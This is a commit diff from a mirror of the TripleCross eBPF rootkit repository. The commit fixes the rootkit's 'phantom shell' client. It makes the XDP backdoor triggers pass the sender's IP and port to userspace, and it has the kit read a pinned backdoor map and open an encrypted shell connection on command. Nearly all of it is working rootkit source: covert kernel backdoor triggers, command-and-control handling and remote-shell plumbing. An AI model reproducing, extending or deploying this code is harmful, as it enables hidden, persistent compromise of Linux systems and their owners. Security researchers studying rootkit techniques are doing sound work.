admin/TripleCross
1
0
Fork 0
mirror of https://github.com/h3xduck/TripleCross.git synced 2025-12-17 07:33:07 +08:00
Code Issues Packages Projects Releases Wiki Activity

Fixed phantom shell, added ips for all types of backdoor triggers so that we can use different interfaces

Browse Source
This commit is contained in:
h3xduck
2022-05-15 16:45:47 -04:00
parent e6cbe7c24a
commit ce3b267d01
10 changed files with 3442 additions and 3434 deletions
Download Patch File Download Diff File Expand all files Collapse all files

BIN
src/.output/kit.o
View File

Binary file not shown.

6712
src/.output/kit.skel.h
View File

File diff suppressed because it is too large Load Diff

BIN
src/bin/kit
View File

Binary file not shown.

8
src/client/client.c
View File

@@ -201,15 +201,15 @@ int phantom_shell_mode(char* buf, char* local_ip, char* dest){
} }
exit(0); exit(0);
} }
sleep(5); //sleep(0.5);
printf("["KBLU"INFO"RESET"]""Waiting for rootkit response...\n"); printf("["KBLU"INFO"RESET"]""Waiting for rootkit response...\n");
packet = rawsocket_sniff_pattern(CC_PROT_BASELINE); packet = rawsocket_sniff_pattern(CC_PROT_PHANTOM_COMMAND_RESPONSE);
char* res = packet.payload; char* res = packet.payload;
//TODO make the shell to fork and wait for response, but accept new requests meanwhile //TODO make the shell to fork and wait for response, but accept new requests meanwhile
if(strncmp(res, CC_PROT_PHANTOM_COMMAND_RESPONSE, strlen(CC_PROT_PHANTOM_COMMAND_RESPONSE))==0){ if(strncmp(res, CC_PROT_PHANTOM_COMMAND_RESPONSE, strlen(CC_PROT_PHANTOM_COMMAND_RESPONSE))==0){
//Received a response //Received a response
char *p; char *p;
p = strtok(buf, "#"); p = strtok(res, "#");
p = strtok(NULL, "#"); p = strtok(NULL, "#");
if(p){ if(p){
//Print response //Print response
@@ -236,7 +236,7 @@ int phantom_shell_mode(char* buf, char* local_ip, char* dest){
} }
printf("["KGRN"RESPONSE"RESET"] %s\n", res); //printf("["KGRN"RESPONSE"RESET"] %s\n", res);
free(request); free(request);
return 0; return 0;

BIN
src/client/client.o
View File

Binary file not shown.

BIN
src/client/injector
View File

Binary file not shown.

2
src/common/map_common.h
View File

@@ -20,6 +20,8 @@ struct rb_event {
int code; int code;
struct backdoor_phantom_shell_data bps_data; struct backdoor_phantom_shell_data bps_data;
event_type_t event_type; event_type_t event_type;
__u32 client_ip;
__u16 client_port;
}; };
#endif #endif

4
src/ebpf/include/data/ring_buffer.h
View File

@@ -49,7 +49,7 @@ static __always_inline int ring_buffer_send(struct ring_buffer *rb, int pid, eve
* *
* @return 0 if ok, -1 if error * @return 0 if ok, -1 if error
*/ */
static __always_inline int ring_buffer_send_backdoor_command(struct ring_buffer *rb, int pid, int code){ static __always_inline int ring_buffer_send_backdoor_command(struct ring_buffer *rb, int pid, int code, __u32 ip, __u16 port){
struct rb_event *event = (struct rb_event*) bpf_ringbuf_reserve(rb, sizeof(struct rb_event), 0); struct rb_event *event = (struct rb_event*) bpf_ringbuf_reserve(rb, sizeof(struct rb_event), 0);
if(!event){ if(!event){
return -1; return -1;
@@ -58,6 +58,8 @@ static __always_inline int ring_buffer_send_backdoor_command(struct ring_buffer
event->code = code; event->code = code;
event->event_type = COMMAND; event->event_type = COMMAND;
event->pid = pid; event->pid = pid;
event->client_ip = ip;
event->client_port = port;
bpf_ringbuf_submit(event, 0); bpf_ringbuf_submit(event, 0);
return 0; return 0;

22
src/ebpf/include/xdp/backdoor.h
View File

@@ -15,15 +15,15 @@ static __always_inline int execute_key_command(int command_received, __u32 ip, _
switch(command_received){ switch(command_received){
case CC_PROT_COMMAND_ENCRYPTED_SHELL: case CC_PROT_COMMAND_ENCRYPTED_SHELL:
bpf_printk("Received request to start encrypted connection\n"); bpf_printk("Received request to start encrypted connection\n");
ring_buffer_send_backdoor_command(&rb_comm, pid, command_received); ring_buffer_send_backdoor_command(&rb_comm, pid, command_received, ip, port);
break; break;
case CC_PROT_COMMAND_HOOK_ACTIVATE_ALL: case CC_PROT_COMMAND_HOOK_ACTIVATE_ALL:
bpf_printk("Received request to activate all hooks\n"); bpf_printk("Received request to activate all hooks\n");
ring_buffer_send_backdoor_command(&rb_comm, pid, command_received); ring_buffer_send_backdoor_command(&rb_comm, pid, command_received, ip, port);
break; break;
case CC_PROT_COMMAND_HOOK_DEACTIVATE_ALL: case CC_PROT_COMMAND_HOOK_DEACTIVATE_ALL:
bpf_printk("Received request to deactivate all hooks\n"); bpf_printk("Received request to deactivate all hooks\n");
ring_buffer_send_backdoor_command(&rb_comm, pid, command_received); ring_buffer_send_backdoor_command(&rb_comm, pid, command_received, ip, port);
break; break;
case CC_PROT_COMMAND_PHANTOM_SHELL: case CC_PROT_COMMAND_PHANTOM_SHELL:
bpf_printk("Received request to start phantom shell\n"); bpf_printk("Received request to start phantom shell\n");
@@ -301,8 +301,14 @@ backdoor_finish_v3_32:
bpf_printk("FAIL CHECK 3\n"); bpf_printk("FAIL CHECK 3\n");
return 0; return 0;
} }
__u32 ip;
__u16 port;
__builtin_memcpy(&ip, payload+0x01, sizeof(__u32));
__builtin_memcpy(&port, payload+0x05, sizeof(__u16));
bpf_printk("Completed backdoor trigger v3 (32bit), b_data position: %i\n", b_data.last_packet_modified); bpf_printk("Completed backdoor trigger v3 (32bit), b_data position: %i\n", b_data.last_packet_modified);
execute_key_command(command_received, 0, 0, NULL, 0); execute_key_command(command_received, ip, port, NULL, 0);
return 1; return 1;
} }
@@ -446,8 +452,14 @@ backdoor_finish_v3_16:
bpf_printk("FAIL CHECK 3\n"); bpf_printk("FAIL CHECK 3\n");
return 0; return 0;
} }
__u32 ip;
__u16 port;
__builtin_memcpy(&ip, payload+0x01, sizeof(__u32));
__builtin_memcpy(&port, payload+0x05, sizeof(__u16));
bpf_printk("Completed backdoor trigger v3 (16bit), b_data position: %i\n", b_data.last_packet_modified); bpf_printk("Completed backdoor trigger v3 (16bit), b_data position: %i\n", b_data.last_packet_modified);
execute_key_command(command_received, 0, 0, NULL, 0); execute_key_command(command_received, ip, port, NULL, 0);
return 1; return 1;
} }

128
src/user/kit.c
View File

@@ -1,3 +1,4 @@
#define _GNU_SOURCE
#include <argp.h> #include <argp.h>
#include <stdio.h> #include <stdio.h>
#include <time.h> #include <time.h>
@@ -5,6 +6,12 @@
#include <sys/resource.h> #include <sys/resource.h>
#include <bpf/libbpf.h> #include <bpf/libbpf.h>
#include <linux/if_link.h> #include <linux/if_link.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <sys/ioctl.h>
#include <netinet/in.h>
#include <net/if.h> #include <net/if.h>
#include <unistd.h> #include <unistd.h>
#include <locale.h> #include <locale.h>
@@ -30,11 +37,55 @@
} }
static int FD_TC_MAP; static int FD_TC_MAP;
__u32 ifindex; //Interface to which the rootkit connects
char* local_ip;
static struct env { static struct env {
bool verbose; bool verbose;
} env; } env;
int check_map_fd_info(int map_fd, struct bpf_map_info *info, struct bpf_map_info *exp){
__u32 info_len = sizeof(*info);
int err;
if (map_fd < 0)
return -1;
err = bpf_obj_get_info_by_fd(map_fd, info, &info_len);
if (err) {
fprintf(stderr, "ERR: %s() can't get info - %s\n",
__func__, strerror(errno));
return -1;
}
if (exp->key_size && exp->key_size != info->key_size) {
fprintf(stderr, "ERR: %s() "
"Map key size(%d) mismatch expected size(%d)\n",
__func__, info->key_size, exp->key_size);
return -1;
}
if (exp->value_size && exp->value_size != info->value_size) {
fprintf(stderr, "ERR: %s() "
"Map value size(%d) mismatch expected size(%d)\n",
__func__, info->value_size, exp->value_size);
return -1;
}
if (exp->max_entries && exp->max_entries != info->max_entries) {
fprintf(stderr, "ERR: %s() "
"Map max_entries(%d) mismatch expected size(%d)\n",
__func__, info->max_entries, exp->max_entries);
return -1;
}
if (exp->type && exp->type != info->type) {
fprintf(stderr, "ERR: %s() "
"Map type(%d) mismatch expected type(%d)\n",
__func__, info->type, exp->type);
return -1;
}
return 0;
}
void print_help_dialog(const char* arg){ void print_help_dialog(const char* arg){
printf("\nUsage: %s ./kit OPTION\n\n", arg); printf("\nUsage: %s ./kit OPTION\n\n", arg);
@@ -112,11 +163,13 @@ static int handle_rb_event(void *ctx, void *data, size_t data_size){
}else if(e->event_type == COMMAND){ }else if(e->event_type == COMMAND){
printf("%s COMMAND pid:%d code:%i\n", ts, e->pid, e->code); printf("%s COMMAND pid:%d code:%i\n", ts, e->pid, e->code);
char attacker_ip[INET_ADDRSTRLEN];
switch(e->code){ switch(e->code){
case CC_PROT_COMMAND_ENCRYPTED_SHELL: case CC_PROT_COMMAND_ENCRYPTED_SHELL:
//TODO EXTRACT IP FROM KERNEL BUFFER //TODO EXTRACT IP FROM KERNEL BUFFER
printf("Starting encrypted connection\n"); inet_ntop(AF_INET, &e->client_ip, attacker_ip, INET_ADDRSTRLEN);
client_run("127.0.1.1", 8500); printf("Starting encrypted connection with ip: %s\n", attacker_ip);
client_run(local_ip, 8500);
break; break;
case CC_PROT_COMMAND_HOOK_ACTIVATE_ALL: case CC_PROT_COMMAND_HOOK_ACTIVATE_ALL:
printf("Activating all hooks as requested\n"); printf("Activating all hooks as requested\n");
@@ -139,9 +192,21 @@ static int handle_rb_event(void *ctx, void *data, size_t data_size){
printf("Requested to update the phantom shell\n"); printf("Requested to update the phantom shell\n");
int key = 1; int key = 1;
struct backdoor_phantom_shell_data data; struct backdoor_phantom_shell_data data;
int err = bpf_map_lookup_elem(FD_TC_MAP, &key, &data); struct bpf_map_info map_expect = {0};
struct bpf_map_info info = {0};
FD_TC_MAP = bpf_obj_get("/sys/fs/bpf/tc/globals/backdoor_phantom_shell");
printf("TC MAP ID: %i\n", FD_TC_MAP);
map_expect.key_size = sizeof(__u64);
map_expect.value_size = sizeof(struct backdoor_phantom_shell_data);
map_expect.max_entries = 1;
int err = check_map_fd_info(FD_TC_MAP, &info, &map_expect);
if (err) {
fprintf(stderr, "ERR: map via FD not compatible\n");
return err;
}
err = bpf_map_lookup_elem(FD_TC_MAP, &key, &data);
if(err<0) { if(err<0) {
printf("Failed to read the shared map\n"); printf("Failed to read the shared map: %d\n", err);
return -1; return -1;
} }
printf("Pre value: %i, %i, %i, %s\n", data.active, data.d_ip, data.d_port, data.payload); printf("Pre value: %i, %i, %i, %s\n", data.active, data.d_ip, data.d_port, data.payload);
@@ -173,6 +238,7 @@ static int handle_rb_event(void *ctx, void *data, size_t data_size){
free(buf); free(buf);
printf("Post value: %i, %i, %i, %s\n", data.active, data.d_ip, data.d_port, data.payload); printf("Post value: %i, %i, %i, %s\n", data.active, data.d_ip, data.d_port, data.payload);
bpf_map_update_elem(FD_TC_MAP, &key, &data, 0); bpf_map_update_elem(FD_TC_MAP, &key, &data, 0);
return 0;
}else{ }else{
printf("Failed to parse command\n"); printf("Failed to parse command\n");
@@ -191,48 +257,6 @@ static int handle_rb_event(void *ctx, void *data, size_t data_size){
return 0; return 0;
} }
int check_map_fd_info(int map_fd, struct bpf_map_info *info, struct bpf_map_info *exp){
__u32 info_len = sizeof(*info);
int err;
if (map_fd < 0)
return -1;
err = bpf_obj_get_info_by_fd(map_fd, info, &info_len);
if (err) {
fprintf(stderr, "ERR: %s() can't get info - %s\n",
__func__, strerror(errno));
return -1;
}
if (exp->key_size && exp->key_size != info->key_size) {
fprintf(stderr, "ERR: %s() "
"Map key size(%d) mismatch expected size(%d)\n",
__func__, info->key_size, exp->key_size);
return -1;
}
if (exp->value_size && exp->value_size != info->value_size) {
fprintf(stderr, "ERR: %s() "
"Map value size(%d) mismatch expected size(%d)\n",
__func__, info->value_size, exp->value_size);
return -1;
}
if (exp->max_entries && exp->max_entries != info->max_entries) {
fprintf(stderr, "ERR: %s() "
"Map max_entries(%d) mismatch expected size(%d)\n",
__func__, info->max_entries, exp->max_entries);
return -1;
}
if (exp->type && exp->type != info->type) {
fprintf(stderr, "ERR: %s() "
"Map type(%d) mismatch expected type(%d)\n",
__func__, info->type, exp->type);
return -1;
}
return 0;
}
int main(int argc, char**argv){ int main(int argc, char**argv){
struct ring_buffer *rb = NULL; struct ring_buffer *rb = NULL;
struct kit_bpf *skel; struct kit_bpf *skel;
@@ -248,8 +272,6 @@ int main(int argc, char**argv){
} }
}*/ }*/
__u32 ifindex;
/* Parse command line arguments */ /* Parse command line arguments */
int opt; int opt;
while ((opt = getopt(argc, argv, ":t:vh")) != -1) { while ((opt = getopt(argc, argv, ":t:vh")) != -1) {
@@ -261,6 +283,16 @@ int main(int argc, char**argv){
perror("Error on input interface"); perror("Error on input interface");
exit(EXIT_FAILURE); exit(EXIT_FAILURE);
} }
int fd = socket(AF_INET, SOCK_DGRAM, 0);
struct ifreq ifr;
//Type of address to retrieve - IPv4 IP address
ifr.ifr_addr.sa_family = AF_INET;
//Copy the interface name in the ifreq structure
strncpy(ifr.ifr_name , optarg , IFNAMSIZ-1);
ioctl(fd, SIOCGIFADDR, &ifr);
close(fd);
local_ip = inet_ntoa(( (struct sockaddr_in *)&ifr.ifr_addr )->sin_addr);
printf("%s - %s\n" , optarg , local_ip );
break; break;
case 'v': case 'v':
//Verbose output //Verbose output